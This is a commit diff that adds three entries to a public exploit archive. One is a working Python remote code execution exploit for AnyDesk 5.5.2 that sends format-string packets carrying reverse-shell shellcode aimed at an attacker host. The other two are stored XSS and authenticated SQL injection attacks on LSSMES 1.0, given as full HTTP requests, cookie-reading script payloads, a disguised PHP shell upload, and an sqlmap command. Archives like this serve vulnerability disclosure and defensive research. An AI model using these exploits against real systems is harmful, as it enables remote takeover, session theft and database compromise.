DB: 2021-03-04

3 changes to exploits/shellcodes AnyDesk 5.5.2 - Remote Code Execution Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS) Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)
2021-03-04 05:01:52 +00:00 · 2021-03-04 05:01:52 +00:00 · 5edc6a08e0
commit 5edc6a08e0
parent b35005d47b
4 changed files with 165 additions and 0 deletions
--- a/exploits/linux/remote/49613.py
+++ b/exploits/linux/remote/49613.py
@ -0,0 +1,50 @@
+# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
+# Date: 09/06/20
+# Exploit Author: scryh
+# Vendor Homepage: https://anydesk.com/en
+# Version: 5.5.2
+# Tested on: Linux
+# Walkthrough: https://devel0pment.de/?p=1881
+
+#!/usr/bin/env python
+import struct
+import socket
+import sys
+
+ip = '192.168.x.x'
+port = 50001
+
+def gen_discover_packet(ad_id, os, hn, user, inf, func):
+  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
+  d += struct.pack('>I', ad_id)
+  d += struct.pack('>I', 0)
+  d += chr(0x2)+chr(os)
+  d += struct.pack('>I', len(hn)) + hn
+  d += struct.pack('>I', len(user)) + user
+  d += struct.pack('>I', 0)
+  d += struct.pack('>I', len(inf)) + inf
+  d += chr(0)
+  d += struct.pack('>I', len(func)) + func
+  d += chr(0x2)+chr(0xc3)+chr(0x51)
+  return d
+
+# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
+shellcode =  b""
+shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
+shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xcb\x46\x40"
+shellcode += b"\x6c\xed\xa4\xe0\xfb\x48\x31\x58\x27\x48\x2d"
+shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xa1\x6f\x18\xf5\x87"
+shellcode += b"\xa6\xbf\x91\xca\x18\x4f\x69\xa5\x33\xa8\x42"
+shellcode += b"\xc9\x46\x41\xd1\x2d\x0c\x96\xf8\x9a\x0e\xc9"
+shellcode += b"\x8a\x87\xb4\xba\x91\xe1\x1e\x4f\x69\x87\xa7"
+shellcode += b"\xbe\xb3\x34\x88\x2a\x4d\xb5\xab\xe5\x8e\x3d"
+shellcode += b"\x2c\x7b\x34\x74\xec\x5b\xd4\xa9\x2f\x2e\x43"
+shellcode += b"\x9e\xcc\xe0\xa8\x83\xcf\xa7\x3e\xba\xec\x69"
+shellcode += b"\x1d\xc4\x43\x40\x6c\xed\xa4\xe0\xfb"
+
+print('sending payload ...')
+p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(p, (ip, port))
+s.close()
+print('reverse shell should connect within 5 seconds')
--- a/exploits/php/webapps/49609.txt
+++ b/exploits/php/webapps/49609.txt
@ -0,0 +1,78 @@
+# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-03-03
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
+# Version: v1.0
+# Tested on: Ubuntu
+
+*Steps to Reproduce:*
+1) Login with Admin Credentials and click on the *Person List* button.
+2) Click on the *Add Person* button.
+3) Now add the 'Ba1man' in the input field of *Name* and 'Ba2man' in the input field of *Address *then intercept it with Burp Suite.
+4) Now add the following payload input field of *Name  & Address*.
+
+Payload 1:  ba1man"></td><script>alert(document.cookie)</script>
+Payload 2:  ba2man"></td><script>alert(document.URL)</script>
+
+4) Click On Add
+5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
+6) XSS payload is triggered.
+7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
+8) Again XSS  payload is triggered
+
+*Proof-of-concept:*
+1) Vulnerable Form Request:
+
+POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
+Firefox/86.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------366892106534365372313887502624
+Content-Length: 1110
+Origin: http:// localhost
+Connection: close
+Referer: http:// localhost /LSSMES/lssems/admin/add-person.php
+Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
+Upgrade-Insecure-Requests: 1
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="category"
+3
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="name"
+
+*ba1man"></td><script>alert(document.cookie)</script>*
+
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"
+Content-Type: image/gif
+GIF8;
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="mobilenumber"
+8524697125
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="address"
+
+*ba1man"></td><script>alert(document.URL)</script>*
+
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="city"
+
+-----------------------------366892106534365372313887502624
+Content-Disposition: form-data; name="submit"
+-----------------------------366892106534365372313887502624--
+
+
+2.1) Response:
+Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
+Note: XSS from name parameter
+
+
+2.2) Response:
+Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
+Note: XSS from address parameter
--- a/exploits/php/webapps/49610.txt
+++ b/exploits/php/webapps/49610.txt
@ -0,0 +1,34 @@
+# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)
+# Date: 2021-03-02
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
+# Version: v1.0
+# Tested on: Ubuntu
+# Detail walkthrough: https://medium.com/@tusharvaidya16/authenticated-blind-error-based-sql-injection-on-local-services-search-engine-management-system-3e99779f0850
+
+*Steps to Reproduce:*
+1) Login with Admin Credentials and click on the *Service Category* button.
+2) Click on the *Manage Category* button.
+3) Now add the double quote ( " ) in the URL after *editid parameter*
+4) At that time we observe that the application is misbehaving now capture this request from the burp suite and save it into an SQL text file.
+4) Now fire up the following command into SQLMAP
+
+CMD: sqlmap -r sql_file.txt --data="editid=1" --curent-db --level 5 --risk 3
+
+4) We got a database.
+
+*Below request from sql_file.txt*
+
+GET /LSSMES/lssems/admin/edit-category-detail.php?editid=* HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
+Firefox/86.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://lcoalhost/LSSMES/lssems/admin/manage-category.php
+Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
+Upgrade-Insecure-Requests: 1
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18391,6 +18391,7 @@ id,file,description,date,author,type,platform,port
 49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows,
 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,
 49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,
+49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -43797,3 +43798,5 @@ id,file,description,date,author,type,platform,port
 49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
 49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
+49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
+49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,